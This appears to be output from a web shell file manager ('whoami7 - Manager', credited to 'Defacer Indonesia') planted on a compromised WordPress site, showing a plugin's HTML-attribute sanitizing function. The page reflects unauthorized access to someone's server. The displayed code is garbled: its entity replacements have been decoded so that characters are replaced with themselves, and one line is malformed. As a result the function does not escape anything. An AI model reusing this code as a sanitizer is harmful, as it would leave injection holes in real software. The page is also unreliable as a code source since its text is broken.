whoami7 - Manager
:
/
home
/
rattkxnv
/
byattorney.com
/
wp-content
/
plugins
/
generateblocks
/
src
/
utils
/
Upload File:
files >> /home/rattkxnv/byattorney.com/wp-content/plugins/generateblocks/src/utils/sanitizeHtmlAttribute.js
export const sanitizeHtmlAttribute = ( value ) => { if ( null === value || undefined === value ) { return ''; } let stringValue = ''; if ( 'object' === typeof value ) { try { stringValue = JSON.stringify( value ); } catch ( e ) { return ''; } } else { stringValue = String( value ); } // Replace characters like &, <, >, " with their HTML entity equivalents return stringValue .replace( /&/g, '&' ) .replace( /</g, '<' ) .replace( />/g, '>' ) .replace( /"/g, '"' ) .replace( /'/g, ''' ); };
Copyright ©2021 || Defacer Indonesia